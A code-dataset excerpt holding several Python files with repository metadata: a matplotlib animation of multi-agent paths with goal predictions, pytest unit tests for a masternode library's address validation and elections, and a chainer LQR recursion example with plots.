e("white")
g = sns.lmplot("dim1", "dim2", hue="cond", data=df_mds, fit_reg=False, legend=False)
ax = g.ax
sns.despine(ax=ax, trim=True, left=True, bottom=True)
ax.axes.get_xaxis().set_visible(False)
ax.axes.get_yaxis().set_visible(False)
ax.grid(False)
for dim1, dim2, name in df_mds.values:
ax.text(dim1 * 1.05, dim2 * 1.05, name)
segments = [[rdm_mds[i, :], rdm_mds[j, :]]
for i in range(len(rdm_mds_pca)) for j in range(len(rdm_mds_pca))]
values = np.abs(rdm)
lc = LineCollection(segments,
zorder=0, cmap=plt.cm.Greys,
norm=plt.Normalize(0, values.max()))
lc.set_array(rdm.flatten())
lc.set_linewidths(0.5 * np.ones(len(segments)))
ax.add_collection(lc)
plt.tight_layout()
plt.show()
| true
| true
|
790c5bf214ecb97f0755569e215d0f279d8471ee
| 6,965
|
py
|
Python
|
visualize.py
|
mirtorande/grpf-tool
|
5c20365366503f28d63f861f1b0326cf1dcdcd7e
|
[
"CC0-1.0"
] | 1
|
2021-03-25T20:51:13.000Z
|
2021-03-25T20:51:13.000Z
|
visualize.py
|
mirtorande/grpf-tool
|
5c20365366503f28d63f861f1b0326cf1dcdcd7e
|
[
"CC0-1.0"
] | null | null | null |
visualize.py
|
mirtorande/grpf-tool
|
5c20365366503f28d63f861f1b0326cf1dcdcd7e
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
from matplotlib.patches import Circle, Rectangle, ConnectionPatch
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation
from math import floor
Colors = ['green', 'purple', 'orange', 'red', 'blue', 'yellow']
class Animation:
def __init__(self, my_map, starts, goals, paths, predictions):
self.my_map = np.flip(np.transpose(my_map), 1)
self.predictions = predictions
self.starts = []
for start in starts:
self.starts.append((start[1], len(self.my_map[0]) - 1 - start[0]))
self.goals = []
for goal in goals:
self.goals.append((goal[1], len(self.my_map[0]) - 1 - goal[0]))
self.paths = []
if paths:
for path in paths:
self.paths.append([])
for loc in path:
self.paths[-1].append((loc[1], len(self.my_map[0]) - 1 - loc[0]))
aspect = len(self.my_map) / len(self.my_map[0])
self.fig = plt.figure(frameon=False, figsize=(4 * aspect, 4))
self.ax = self.fig.add_subplot(111, aspect='equal')
self.fig.subplots_adjust(left=0, right=1, bottom=0, top=1, wspace=None, hspace=None)
# self.ax.set_frame_on(False)
self.patches = []
self.artists = []
self.agents = dict()
self.agent_names = dict()
self.goal_predictions = dict()
self.agent_goal_connections = dict()
# create boundary patch
x_min = -0.5
y_min = -0.5
x_max = len(self.my_map) - 0.5
y_max = len(self.my_map[0]) - 0.5
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(np.arange(x_min, x_max, 1))
plt.yticks(np.arange(y_min, y_max, 1))
plt.grid(color='0.85')
self.patches.append(Rectangle((x_min, y_min), x_max - x_min, y_max - y_min, facecolor='none', edgecolor='gray'))
for i in range(len(self.my_map)):
for j in range(len(self.my_map[0])):
if self.my_map[i][j]:
self.patches.append(Rectangle((i - 0.5, j - 0.5), 1, 1, facecolor='gray', edgecolor='gray'))
self.T = 0
# draw goals
for i, goal in enumerate(self.goals):
goal_color = Colors[i % len(Colors)]
self.patches.append(Rectangle((goal[0] - 0.25, goal[1] - 0.25), 0.5, 0.5, facecolor=goal_color,
edgecolor='black', alpha=0.5))
# create agents
for a in range(len(self.paths)):
name = str(a)
self.agents[a] = Circle((starts[a][0], starts[a][1]), 0.3, facecolor=Colors[a % len(Colors)],
edgecolor='black')
self.agents[a].original_face_color = Colors[a % len(Colors)]
self.patches.append(self.agents[a])
self.T = max(self.T, len(paths[a]) - 1)
self.agent_names[a] = self.ax.text(starts[a][0], starts[a][1] + 0.25, name)
self.agent_names[a].set_horizontalalignment('center')
self.agent_names[a].set_verticalalignment('center')
self.artists.append(self.agent_names[a])
# connections & predictions
self.goal_predictions[a] = dict()
self.agent_goal_connections[a] = dict()
for i, goal in enumerate(self.goals):
goal_color = Colors[i % len(Colors)]
self.goal_predictions[a][i] = self.ax.text(goal[0], goal[1], str(i))
self.goal_predictions[a][i].set_horizontalalignment('center')
self.goal_predictions[a][i].set_verticalalignment('center')
self.artists.append(self.goal_predictions[a][i])
self.agent_goal_connections[a][i] = plt.Line2D((start[1], goal[0]), (len(self.my_map[0]) - 1 - start[0], goal[1]), lw=2.5, color = goal_color)
self.artists.append(self.agent_goal_connections[a][i])
self.animation = animation.FuncAnimation(self.fig, self.animate_func,
init_func=self.init_func,
frames=int(self.T + 1) * 10,
interval=100,
blit=True)
def save(self, file_name, speed):
self.animation.save(
file_name,
fps=10 * speed,
dpi=200,
savefig_kwargs={"pad_inches": 0})
@staticmethod
def show():
plt.show()
def init_func(self):
for p in self.patches:
self.ax.add_patch(p)
for a in self.artists:
self.ax.add_artist(a)
return self.patches + self.artists
def animate_func(self, t):
# per ogni agente
for a in range(len(self.paths)):
pos = self.get_state(t / 10, self.paths[a])
self.agents[a].center = (pos[0], pos[1])
self.agent_names[a].set_position((pos[0], pos[1] + 0.5))
# per ogni goal
for i in self.agent_goal_connections[a]:
timestep = floor(t/10)
if timestep not in self.predictions[a]:
continue
prediction = self.predictions[a][timestep][i]
# Linee
self.agent_goal_connections[a][i].set_data([pos[0], self.goals[i][0]], [pos[1], self.goals[i][1]])
self.agent_goal_connections[a][i].set_alpha(prediction)
# Percentuali
self.goal_predictions[a][i].set_text("{:.2f}".format(prediction*100))
self.goal_predictions[a][i].set_position([(pos[0] + self.goals[i][0])/2, (pos[1] + self.goals[i][1])/2])
self.goal_predictions[a][i].set_alpha(prediction)
# reset all colors
for _, agent in self.agents.items():
agent.set_facecolor(agent.original_face_color)
# check drive-drive collisions
agents_array = [agent for _, agent in self.agents.items()]
for i in range(0, len(agents_array)):
for j in range(i + 1, len(agents_array)):
d1 = agents_array[i]
d2 = agents_array[j]
pos1 = np.array(d1.center)
pos2 = np.array(d2.center)
if np.linalg.norm(pos1 - pos2) < 0.7:
d1.set_facecolor('red')
d2.set_facecolor('red')
print("COLLISION! (agent-agent) ({}, {}) at time {}".format(i, j, t/10))
return self.patches + self.artists
@staticmethod
def get_state(t, path):
if int(t) <= 0:
return np.array(path[0])
elif int(t) >= len(path):
return np.array(path[-1])
else:
pos_last = np.array(path[int(t) - 1])
pos_next = np.array(path[int(t)])
pos = (pos_next - pos_last) * (t - int(t)) + pos_last
return pos
| 41.706587
| 158
| 0.535822
|
from matplotlib.patches import Circle, Rectangle, ConnectionPatch
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation
from math import floor
Colors = ['green', 'purple', 'orange', 'red', 'blue', 'yellow']
class Animation:
    def __init__(self, my_map, starts, goals, paths, predictions):
        """Build the matplotlib figure and all patches/artists for the
        multi-agent path animation.

        Coordinates are converted from (row, col) map indexing into the
        plot's (x, y) frame via transpose + vertical flip.
        """
        self.my_map = np.flip(np.transpose(my_map), 1)
        self.predictions = predictions
        # Convert start/goal/path coordinates into the plotting frame.
        self.starts = []
        for start in starts:
            self.starts.append((start[1], len(self.my_map[0]) - 1 - start[0]))
        self.goals = []
        for goal in goals:
            self.goals.append((goal[1], len(self.my_map[0]) - 1 - goal[0]))
        self.paths = []
        if paths:
            for path in paths:
                self.paths.append([])
                for loc in path:
                    self.paths[-1].append((loc[1], len(self.my_map[0]) - 1 - loc[0]))
        aspect = len(self.my_map) / len(self.my_map[0])
        self.fig = plt.figure(frameon=False, figsize=(4 * aspect, 4))
        self.ax = self.fig.add_subplot(111, aspect='equal')
        self.fig.subplots_adjust(left=0, right=1, bottom=0, top=1, wspace=None, hspace=None)
        self.patches = []
        self.artists = []
        self.agents = dict()
        self.agent_names = dict()
        self.goal_predictions = dict()
        self.agent_goal_connections = dict()
        # Axis limits and a faint cell grid.
        x_min = -0.5
        y_min = -0.5
        x_max = len(self.my_map) - 0.5
        y_max = len(self.my_map[0]) - 0.5
        plt.xlim(x_min, x_max)
        plt.ylim(y_min, y_max)
        plt.xticks(np.arange(x_min, x_max, 1))
        plt.yticks(np.arange(y_min, y_max, 1))
        plt.grid(color='0.85')
        self.patches.append(Rectangle((x_min, y_min), x_max - x_min, y_max - y_min, facecolor='none', edgecolor='gray'))
        # Obstacle cells.
        for i in range(len(self.my_map)):
            for j in range(len(self.my_map[0])):
                if self.my_map[i][j]:
                    self.patches.append(Rectangle((i - 0.5, j - 0.5), 1, 1, facecolor='gray', edgecolor='gray'))
        self.T = 0
        # Goal squares, colour-coded per goal index.
        for i, goal in enumerate(self.goals):
            goal_color = Colors[i % len(Colors)]
            self.patches.append(Rectangle((goal[0] - 0.25, goal[1] - 0.25), 0.5, 0.5, facecolor=goal_color,
                                          edgecolor='black', alpha=0.5))
        # One circle + name label per agent, plus a prediction line/label
        # towards every goal.
        for a in range(len(self.paths)):
            name = str(a)
            self.agents[a] = Circle((starts[a][0], starts[a][1]), 0.3, facecolor=Colors[a % len(Colors)],
                                    edgecolor='black')
            self.agents[a].original_face_color = Colors[a % len(Colors)]
            self.patches.append(self.agents[a])
            self.T = max(self.T, len(paths[a]) - 1)
            self.agent_names[a] = self.ax.text(starts[a][0], starts[a][1] + 0.25, name)
            self.agent_names[a].set_horizontalalignment('center')
            self.agent_names[a].set_verticalalignment('center')
            self.artists.append(self.agent_names[a])
            self.goal_predictions[a] = dict()
            self.agent_goal_connections[a] = dict()
            for i, goal in enumerate(self.goals):
                goal_color = Colors[i % len(Colors)]
                self.goal_predictions[a][i] = self.ax.text(goal[0], goal[1], str(i))
                self.goal_predictions[a][i].set_horizontalalignment('center')
                self.goal_predictions[a][i].set_verticalalignment('center')
                self.artists.append(self.goal_predictions[a][i])
                # NOTE(review): `start` here is the leftover loop variable
                # from the starts-conversion loop above (i.e. the *last*
                # agent's raw start), not agent `a`'s start.  The endpoints
                # are re-set every frame in animate_func, so it is harmless
                # visually, but it looks unintentional -- confirm.
                self.agent_goal_connections[a][i] = plt.Line2D((start[1], goal[0]), (len(self.my_map[0]) - 1 - start[0], goal[1]), lw=2.5, color = goal_color)
                self.artists.append(self.agent_goal_connections[a][i])
        self.animation = animation.FuncAnimation(self.fig, self.animate_func,
                                                 init_func=self.init_func,
                                                 frames=int(self.T + 1) * 10,
                                                 interval=100,
                                                 blit=True)
def save(self, file_name, speed):
self.animation.save(
file_name,
fps=10 * speed,
dpi=200,
savefig_kwargs={"pad_inches": 0})
@staticmethod
def show():
plt.show()
def init_func(self):
for p in self.patches:
self.ax.add_patch(p)
for a in self.artists:
self.ax.add_artist(a)
return self.patches + self.artists
def animate_func(self, t):
for a in range(len(self.paths)):
pos = self.get_state(t / 10, self.paths[a])
self.agents[a].center = (pos[0], pos[1])
self.agent_names[a].set_position((pos[0], pos[1] + 0.5))
for i in self.agent_goal_connections[a]:
timestep = floor(t/10)
if timestep not in self.predictions[a]:
continue
prediction = self.predictions[a][timestep][i]
self.agent_goal_connections[a][i].set_data([pos[0], self.goals[i][0]], [pos[1], self.goals[i][1]])
self.agent_goal_connections[a][i].set_alpha(prediction)
self.goal_predictions[a][i].set_text("{:.2f}".format(prediction*100))
self.goal_predictions[a][i].set_position([(pos[0] + self.goals[i][0])/2, (pos[1] + self.goals[i][1])/2])
self.goal_predictions[a][i].set_alpha(prediction)
for _, agent in self.agents.items():
agent.set_facecolor(agent.original_face_color)
agents_array = [agent for _, agent in self.agents.items()]
for i in range(0, len(agents_array)):
for j in range(i + 1, len(agents_array)):
d1 = agents_array[i]
d2 = agents_array[j]
pos1 = np.array(d1.center)
pos2 = np.array(d2.center)
if np.linalg.norm(pos1 - pos2) < 0.7:
d1.set_facecolor('red')
d2.set_facecolor('red')
print("COLLISION! (agent-agent) ({}, {}) at time {}".format(i, j, t/10))
return self.patches + self.artists
@staticmethod
def get_state(t, path):
if int(t) <= 0:
return np.array(path[0])
elif int(t) >= len(path):
return np.array(path[-1])
else:
pos_last = np.array(path[int(t) - 1])
pos_next = np.array(path[int(t)])
pos = (pos_next - pos_last) * (t - int(t)) + pos_last
return pos
| true
| true
|
790c5cd73f720c4705a7e0c57f532296b4321a6d
| 5,650
|
py
|
Python
|
test/unit/test_parkingy_things.py
|
hexter2018/sentinel
|
99dc1f1b6eeb49d2b98eddddb2c43d9e350940c9
|
[
"MIT"
] | null | null | null |
test/unit/test_parkingy_things.py
|
hexter2018/sentinel
|
99dc1f1b6eeb49d2b98eddddb2c43d9e350940c9
|
[
"MIT"
] | null | null | null |
test/unit/test_parkingy_things.py
|
hexter2018/sentinel
|
99dc1f1b6eeb49d2b98eddddb2c43d9e350940c9
|
[
"MIT"
] | null | null | null |
import pytest
import sys
import os
os.environ['SENTINEL_CONFIG'] = os.path.normpath(os.path.join(os.path.dirname(__file__), '../test_sentinel.conf'))
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../../lib')))
@pytest.fixture
def valid_parking_address(network='mainnet'):
    """Known-good parking address for the requested network."""
    if network == 'testnet':
        return 'yYe8KwyaUu5YswSYmB3q3ryx8XTUu9y7Ui'
    return 'XpjStRH8SgA6PjgebtPZqCa9y7hLXP767n'
@pytest.fixture
def invalid_parking_address(network='mainnet'):
    """Known-bad (checksum-broken) parking address for the requested network."""
    if network == 'testnet':
        return 'yYe8KwyaUu5YswSYmB3q3ryx8XTUu9y7Uj'
    return 'XpjStRH8SgA6PjgebtPZqCa9y7hLXP767m'
@pytest.fixture
def current_block_hash():
    """Fixed block hash used by the deterministic election tests."""
    block_hash = '000001c9ba1df5a1c58a4e458fb6febfe9329b1947802cd60a4ae90dd754b534'
    return block_hash
@pytest.fixture
def mn_list():
    """Build a small list of Masternode objects from raw `masternodelist full`
    RPC output (vin -> whitespace-separated status string)."""
    from masternode import Masternode
    masternodelist_full = {
        u'701854b26809343704ab31d1c45abc08f9f83c5c2bd503a9d5716ef3c0cda857-1': u'  ENABLED 70201 yjaFS6dudxUTxYPTDB9BYd1Nv4vMJXm3vK 1474157572        82842 1474152618  71111 52.90.74.124:19999',
        u'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1': u'  ENABLED 70201 yUuAsYCnG5XrjgsGvRwcDqPhgLUnzNfe8L 1474157732      1590425 1474155175  71122 [2604:a880:800:a1::9b:0]:19999',
        u'656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1': u'  ENABLED 70201 yepN97UoBLoP2hzWnwWGRVTcWtw1niKwcB 1474157704       824622 1474152571  71110 178.62.203.249:19999',
    }
    mnlist = [Masternode(vin, mnstring) for (vin, mnstring) in masternodelist_full.items()]
    return mnlist
@pytest.fixture
def mn_status_good():
    """`masternode status` payload for a successfully started node."""
    # valid masternode status enabled & running
    status = {
        "vin": "CTxIn(COutPoint(f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56, 1), scriptSig=)",
        "service": "[2604:a880:800:a1::9b:0]:19999",
        "pubkey": "yUuAsYCnG5XrjgsGvRwcDqPhgLUnzNfe8L",
        "status": "Masternode successfully started"
    }
    return status
@pytest.fixture
def mn_status_bad():
    """`masternode status` payload for a node that has not activated yet
    (all-zero coinbase vin, unbound service address)."""
    # valid masternode but not running/waiting
    status = {
        "vin": "CTxIn(COutPoint(0000000000000000000000000000000000000000000000000000000000000000, 4294967295), coinbase )",
        "service": "[::]:0",
        "status": "Node just started, not yet activated"
    }
    return status
# ========================================================================
def test_valid_parking_address():
    """Valid addresses must validate only against their own network."""
    from parkinglib import is_valid_parking_address
    # NOTE(review): valid_parking_address is declared as a pytest fixture but
    # is called directly here; modern pytest raises on direct fixture calls --
    # confirm the pinned pytest version tolerates this.
    main = valid_parking_address()
    test = valid_parking_address('testnet')
    assert is_valid_parking_address(main) is True
    assert is_valid_parking_address(main, 'mainnet') is True
    assert is_valid_parking_address(main, 'testnet') is False
    assert is_valid_parking_address(test) is False
    assert is_valid_parking_address(test, 'mainnet') is False
    assert is_valid_parking_address(test, 'testnet') is True
def test_invalid_parking_address():
    """Checksum-broken addresses must fail validation on every network."""
    from parkinglib import is_valid_parking_address
    # NOTE(review): direct call to a pytest fixture -- see note in
    # test_valid_parking_address.
    main = invalid_parking_address()
    test = invalid_parking_address('testnet')
    assert is_valid_parking_address(main) is False
    assert is_valid_parking_address(main, 'mainnet') is False
    assert is_valid_parking_address(main, 'testnet') is False
    assert is_valid_parking_address(test) is False
    assert is_valid_parking_address(test, 'mainnet') is False
    assert is_valid_parking_address(test, 'testnet') is False
def test_deterministic_masternode_elections(current_block_hash, mn_list):
    """The election winner must be a deterministic function of the block hash.

    Bug fix: this definition used ``elect_mn`` without importing it, so it
    raised NameError whenever it actually ran (previously masked only by the
    identically named duplicate definition below, which shadows this one).
    """
    from parkinglib import elect_mn
    winner = elect_mn(block_hash=current_block_hash, mnlist=mn_list)
    assert winner == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
    winner = elect_mn(block_hash='00000056bcd579fa3dc9a1ee41e8124a4891dcf2661aa3c07cc582bfb63b52b9', mnlist=mn_list)
    assert winner == '656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1'
def test_deterministic_masternode_elections(current_block_hash, mn_list):
    """The election winner must be a deterministic function of the block hash.

    NOTE(review): this redefines (and therefore shadows) the identically
    named test above; the duplicate should probably be removed.
    """
    from parkinglib import elect_mn
    winner = elect_mn(block_hash=current_block_hash, mnlist=mn_list)
    assert winner == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
    winner = elect_mn(block_hash='00000056bcd579fa3dc9a1ee41e8124a4891dcf2661aa3c07cc582bfb63b52b9', mnlist=mn_list)
    assert winner == '656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1'
def test_parse_masternode_status_vin():
    """vin parsing: txid-index for a real outpoint, None for the coinbase
    placeholder of a not-yet-activated node."""
    from parkinglib import parse_masternode_status_vin
    # NOTE(review): mn_status_good/mn_status_bad are pytest fixtures called
    # directly -- see note in test_valid_parking_address.
    status = mn_status_good()
    vin = parse_masternode_status_vin(status['vin'])
    assert vin == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
    status = mn_status_bad()
    vin = parse_masternode_status_vin(status['vin'])
    assert vin is None
def test_hash_function():
    """hashit() of a known superblock hex payload must equal the known digest."""
    import parkinglib
    # Hex-encoded JSON superblock payload (event height, addresses, amounts).
    sb_data_hex = '7b226576656e745f626c6f636b5f686569676874223a2037323639362c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e7473223a202232352e37353030303030307c32352e3735303030303030222c202274797065223a20327d'
    sb_hash = '7ae8b02730113382ea75cbb1eecc497c3aa1fdd9e76e875e38617e07fb2cb21a'
    hex_hash = "%x" % parkinglib.hashit(sb_data_hex)
    assert hex_hash == sb_hash
def test_blocks_to_seconds():
    """blocks_to_seconds() must scale linearly with the block count."""
    import parkinglib
    from decimal import Decimal
    # Compare to 3 decimal places to tolerate float rounding.
    precision = Decimal('0.001')
    assert Decimal(parkinglib.blocks_to_seconds(0)) == Decimal(0.0)
    # 2 blocks == 314.4 s implies ~157.2 s per block -- presumably the chain's
    # target block time; confirm against parkinglib.
    assert Decimal(parkinglib.blocks_to_seconds(2)).quantize(precision) \
        == Decimal(314.4).quantize(precision)
    assert int(parkinglib.blocks_to_seconds(16616)) == 2612035
| 40.070922
| 380
| 0.777699
|
import pytest
import sys
import os
os.environ['SENTINEL_CONFIG'] = os.path.normpath(os.path.join(os.path.dirname(__file__), '../test_sentinel.conf'))
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../../lib')))
@pytest.fixture
def valid_parking_address(network='mainnet'):
return 'yYe8KwyaUu5YswSYmB3q3ryx8XTUu9y7Ui' if (network == 'testnet') else 'XpjStRH8SgA6PjgebtPZqCa9y7hLXP767n'
@pytest.fixture
def invalid_parking_address(network='mainnet'):
return 'yYe8KwyaUu5YswSYmB3q3ryx8XTUu9y7Uj' if (network == 'testnet') else 'XpjStRH8SgA6PjgebtPZqCa9y7hLXP767m'
@pytest.fixture
def current_block_hash():
return '000001c9ba1df5a1c58a4e458fb6febfe9329b1947802cd60a4ae90dd754b534'
@pytest.fixture
def mn_list():
from masternode import Masternode
masternodelist_full = {
u'701854b26809343704ab31d1c45abc08f9f83c5c2bd503a9d5716ef3c0cda857-1': u' ENABLED 70201 yjaFS6dudxUTxYPTDB9BYd1Nv4vMJXm3vK 1474157572 82842 1474152618 71111 52.90.74.124:19999',
u'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1': u' ENABLED 70201 yUuAsYCnG5XrjgsGvRwcDqPhgLUnzNfe8L 1474157732 1590425 1474155175 71122 [2604:a880:800:a1::9b:0]:19999',
u'656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1': u' ENABLED 70201 yepN97UoBLoP2hzWnwWGRVTcWtw1niKwcB 1474157704 824622 1474152571 71110 178.62.203.249:19999',
}
mnlist = [Masternode(vin, mnstring) for (vin, mnstring) in masternodelist_full.items()]
return mnlist
@pytest.fixture
def mn_status_good():
status = {
"vin": "CTxIn(COutPoint(f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56, 1), scriptSig=)",
"service": "[2604:a880:800:a1::9b:0]:19999",
"pubkey": "yUuAsYCnG5XrjgsGvRwcDqPhgLUnzNfe8L",
"status": "Masternode successfully started"
}
return status
@pytest.fixture
def mn_status_bad():
status = {
"vin": "CTxIn(COutPoint(0000000000000000000000000000000000000000000000000000000000000000, 4294967295), coinbase )",
"service": "[::]:0",
"status": "Node just started, not yet activated"
}
return status
def test_valid_parking_address():
from parkinglib import is_valid_parking_address
main = valid_parking_address()
test = valid_parking_address('testnet')
assert is_valid_parking_address(main) is True
assert is_valid_parking_address(main, 'mainnet') is True
assert is_valid_parking_address(main, 'testnet') is False
assert is_valid_parking_address(test) is False
assert is_valid_parking_address(test, 'mainnet') is False
assert is_valid_parking_address(test, 'testnet') is True
def test_invalid_parking_address():
from parkinglib import is_valid_parking_address
main = invalid_parking_address()
test = invalid_parking_address('testnet')
assert is_valid_parking_address(main) is False
assert is_valid_parking_address(main, 'mainnet') is False
assert is_valid_parking_address(main, 'testnet') is False
assert is_valid_parking_address(test) is False
assert is_valid_parking_address(test, 'mainnet') is False
assert is_valid_parking_address(test, 'testnet') is False
def test_deterministic_masternode_elections(current_block_hash, mn_list):
winner = elect_mn(block_hash=current_block_hash, mnlist=mn_list)
assert winner == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
winner = elect_mn(block_hash='00000056bcd579fa3dc9a1ee41e8124a4891dcf2661aa3c07cc582bfb63b52b9', mnlist=mn_list)
assert winner == '656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1'
def test_deterministic_masternode_elections(current_block_hash, mn_list):
from parkinglib import elect_mn
winner = elect_mn(block_hash=current_block_hash, mnlist=mn_list)
assert winner == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
winner = elect_mn(block_hash='00000056bcd579fa3dc9a1ee41e8124a4891dcf2661aa3c07cc582bfb63b52b9', mnlist=mn_list)
assert winner == '656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1'
def test_parse_masternode_status_vin():
from parkinglib import parse_masternode_status_vin
status = mn_status_good()
vin = parse_masternode_status_vin(status['vin'])
assert vin == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
status = mn_status_bad()
vin = parse_masternode_status_vin(status['vin'])
assert vin is None
def test_hash_function():
import parkinglib
sb_data_hex = '7b226576656e745f626c6f636b5f686569676874223a2037323639362c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e7473223a202232352e37353030303030307c32352e3735303030303030222c202274797065223a20327d'
sb_hash = '7ae8b02730113382ea75cbb1eecc497c3aa1fdd9e76e875e38617e07fb2cb21a'
hex_hash = "%x" % parkinglib.hashit(sb_data_hex)
assert hex_hash == sb_hash
def test_blocks_to_seconds():
import parkinglib
from decimal import Decimal
precision = Decimal('0.001')
assert Decimal(parkinglib.blocks_to_seconds(0)) == Decimal(0.0)
assert Decimal(parkinglib.blocks_to_seconds(2)).quantize(precision) \
== Decimal(314.4).quantize(precision)
assert int(parkinglib.blocks_to_seconds(16616)) == 2612035
| true
| true
|
790c5ceee140cc410ea703f768529c4f172a1fea
| 2,260
|
py
|
Python
|
examples/Boyd_lqr.py
|
msakai/chainer-differentiable-mpc
|
dba5712f42a684748515d9ad5e2ff2823516c88e
|
[
"MIT"
] | 10
|
2019-10-07T03:00:42.000Z
|
2022-01-14T01:49:14.000Z
|
examples/Boyd_lqr.py
|
msakai/chainer-differentiable-mpc
|
dba5712f42a684748515d9ad5e2ff2823516c88e
|
[
"MIT"
] | null | null | null |
examples/Boyd_lqr.py
|
msakai/chainer-differentiable-mpc
|
dba5712f42a684748515d9ad5e2ff2823516c88e
|
[
"MIT"
] | 6
|
2019-10-08T05:04:40.000Z
|
2022-02-28T09:40:54.000Z
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
print(sys.path)
sys.path.append("../lqr")
from lqr_recursion import LqrRecursion
import chainer
import numpy as np
import matplotlib.pyplot as plt
# Horizon length and problem dimensions (3 states, 1 control, 4 state+control).
T =51
f = None
n_state =3
n_ctrl =1
n_sc = n_ctrl +n_state
# Time-invariant dynamics F (3x4, last column is the control effect) and
# zero linear cost term c, replicated over the whole horizon.
F =chainer.Variable(np.array([(np.array([[
    1.0,0, 0, 1],
    [1,1.0,0,0],
    [0, 1, 1, 0]])) for i in range(T)])).reshape(T,1,n_state,n_sc,)
c = chainer.Variable(np.array([(np.array([0,0,0.0,0]).T) for i in range(T)])).reshape(T,1,n_sc,)
# Quadratic cost C: penalizes the 3rd state and the control; the final step
# uses a tiny control weight instead of zero -- presumably to keep the
# matrix invertible in the backward recursion (confirm).
_C = np.array([np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,1]]) for i in range(T-1)])
_C = np.append(_C , np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,0.00000000000001]]))
C = chainer.Variable(_C).reshape(T,1,n_sc, n_sc)
x_init = chainer.Variable(np.array([0.5428, 0.7633,0.3504])).reshape(1,n_state)
C
test = LqrRecursion(x_init,C,c,F,f,T,n_state,n_ctrl)
# Backward pass: feedback gains Ks and feedforward terms ks.
Ks, ks = test.backward()
# Plot the first two gain components over the horizon.
k1 =[]
k2 = []
fig, ax = plt.subplots()
for i in range(T-1):
    k1.append(Ks[i][0][0][0].data)
    k2.append(Ks[i][0][0][1].data)
major_ticks = np.arange(0,T, 2)
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
        linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
        linestyle = "--", linewidth = 1)
ax.set_xticks(major_ticks)
ax.set_ylim(-0.5, 1.2)
ax.plot(k1)
ax.plot(k2)
ax.set_ylim(-2, 0)
ax.set_xlim(0,T)
# Forward pass: state trajectory x and controls u.
x,u = test.solve_recursion()
# +
# Plot the first state component of the resulting trajectory.
us = []
for i in range(T):
    us.append(x[i][0][0].data)
fig, ax = plt.subplots()
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
        linestyle = "--", linewidth = 1)
# Set grid lines on the y axis.
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
        linestyle = "--", linewidth = 1)
major_ticks = np.arange(0, 20, 2)
ax.set_xticks(major_ticks)
ax.set_ylim(-2, 1)
ax.set_xlim(0, 20)
ax.plot(us, marker='.')
plt.show()
# -
# Trailing jupytext cells: bare expressions for interactive inspection only.
Ks
Ks
len(Ks)
x
| 23.298969
| 96
| 0.567257
|
import sys
print(sys.path)
sys.path.append("../lqr")
from lqr_recursion import LqrRecursion
import chainer
import numpy as np
import matplotlib.pyplot as plt
T =51
f = None
n_state =3
n_ctrl =1
n_sc = n_ctrl +n_state
F =chainer.Variable(np.array([(np.array([[
1.0,0, 0, 1],
[1,1.0,0,0],
[0, 1, 1, 0]])) for i in range(T)])).reshape(T,1,n_state,n_sc,)
c = chainer.Variable(np.array([(np.array([0,0,0.0,0]).T) for i in range(T)])).reshape(T,1,n_sc,)
_C = np.array([np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,1]]) for i in range(T-1)])
_C = np.append(_C , np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,0.00000000000001]]))
C = chainer.Variable(_C).reshape(T,1,n_sc, n_sc)
x_init = chainer.Variable(np.array([0.5428, 0.7633,0.3504])).reshape(1,n_state)
C
test = LqrRecursion(x_init,C,c,F,f,T,n_state,n_ctrl)
Ks, ks = test.backward()
k1 =[]
k2 = []
fig, ax = plt.subplots()
for i in range(T-1):
k1.append(Ks[i][0][0][0].data)
k2.append(Ks[i][0][0][1].data)
major_ticks = np.arange(0,T, 2)
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
